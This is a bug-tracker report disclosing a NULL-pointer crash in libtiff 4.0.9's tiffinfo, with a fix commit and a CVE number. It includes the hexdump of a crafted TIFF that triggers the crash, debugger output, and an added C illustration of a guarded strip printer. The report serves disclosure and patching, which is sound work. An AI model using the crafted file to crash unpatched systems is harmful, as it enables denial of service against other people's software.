Created an attachment (id=838)
Crafted TIFF Image to trigger the Crash

There is a Null-Pointer Dereference occurring with tiffinfo.c in libtiff 4.0.9. This can be triggered by running the following command:

    tiffinfo -s %file%

Where a malformed TIFF file is being supplied for parsing.

The hexdump of the file causing the crash is:

    0000000 4d4d 2a00 0000 0800 1700 3030 3030 3030
    0000010 3030 3030 3030 0001 0300 0000 0100 3030
    0000020 3030 0101 0300 0000 0100 3030 3030 3030
    0000030 3030 3030 3030 3030 3030 0301 0300 0000
    0000040 0100 0600 3030 3030 3030 3030 3030 3030
    0000050 3030 1101 0400 3030 3030 3030 3030 3030
    0000060 3030 3030 3030 3030 3030 3030 3030 3030
    *
    000011e

The relevant Memcheck output is:

    ==24890== Process terminating with default action of signal 11 (SIGSEGV)
    ==24890==  Access not within mapped region at address 0x0
    ==24890==    at 0x432F02: TIFFPrintDirectory (tif_print.c:673)
    ==24890==    by 0x4027EF: tiffinfo (tiffinfo.c:463)
    ==24890==    by 0x402406: main (tiffinfo.c:152)

The NULL Pointer Dereference seems to get triggered while parsing the "1 Strips: " section of the image in the function call TIFFPrintDirectory, where a fprintf call is being made with a NULL pointer.

The output of tiffinfo while running the command on this file is:

    ./tiffinfo -s tiff_npd
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 12336 (0x3030) encountered.
    TIFFReadDirectory: Warning, Photometric tag is missing, assuming data is YCbCr.
    TIFFReadDirectory: Warning, BitsPerSample tag is missing, assuming 8 bits per sample.
    TIFFReadDirectory: Warning, SamplesPerPixel tag is missing, applying correct SamplesPerPixel value of 3.
    tiff_npd: Old-style JPEG compression support is not configured.
    TIFF Directory at offset 0x8 (8)
      Image Width: 12336 Image Length: 12336
      Bits/Sample: 8
      Compression Scheme: Old-style JPEG
      Photometric Interpretation: YCbCr
      Samples/Pixel: 3
      Planar Configuration: single image plane
      1 Strips:
    Segmentation fault

Debug info:
    libtiff version 4.0.9
    OS: Ubuntu 17.10
    Compiler: gcc 7.2.0 / clang 4.0.1-6
    Target: x86-64-pc-linux-gnu
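The failure mode described in the report (a strip count greater than zero while the strip offset/bytecount arrays were never populated, so the strip printer dereferences NULL) can be modelled and guarded against as follows. This is an added illustration, not libtiff's code or the upstream fix; the struct and function names are hypothetical stand-ins for the directory fields TIFFPrintDirectory walks.

```c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

/* Toy model of the directory fields a strip listing needs. Hypothetical
 * names; libtiff's real TIFFDirectory is larger and named differently. */
typedef struct {
    uint32_t  nstrips;         /* strip count derived from image geometry    */
    uint64_t *stripoffset;     /* NULL if StripOffsets was missing/unusable    */
    uint64_t *stripbytecount;  /* NULL if StripByteCounts was missing/unusable */
} strip_dir;

/* Hardened strip printer: validates that the arrays exist before indexing
 * them. Returns the number of strips printed, or -1 when the directory is
 * inconsistent (nstrips > 0 but an array is NULL), which is exactly the
 * state the crafted file above leaves the parser in. */
int print_strips(FILE *out, const strip_dir *td) {
    if (td->nstrips > 0 &&
        (td->stripoffset == NULL || td->stripbytecount == NULL)) {
        fprintf(out, "  %lu Strips: (offsets/bytecounts unavailable)\n",
                (unsigned long) td->nstrips);
        return -1;
    }
    fprintf(out, "  %lu Strips:\n", (unsigned long) td->nstrips);
    for (uint32_t s = 0; s < td->nstrips; s++)
        fprintf(out, "    %3lu: [%8llu, %8llu]\n", (unsigned long) s,
                (unsigned long long) td->stripoffset[s],
                (unsigned long long) td->stripbytecount[s]);
    return (int) td->nstrips;
}

/* Constructed: a well-formed two-strip directory. */
int demo_valid(void) {
    uint64_t off[2] = {8, 2056}, cnt[2] = {2048, 512};
    strip_dir td = {2, off, cnt};
    return print_strips(stdout, &td);
}

/* Constructed: one strip, no arrays, the shape of the crafted file. */
int demo_crafted(void) {
    strip_dir td = {1, NULL, NULL};
    return print_strips(stdout, &td);
}

int main(void) {
    demo_valid();
    demo_crafted();   /* prints a diagnostic instead of faulting at 0x0 */
    return 0;
}
```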
Fixed per https://gitlab.com/libtiff/libtiff/commit/c6f41df7b581402dfba3c19a1e3df4454c551a01
This issue has been assigned CVE-2017-18013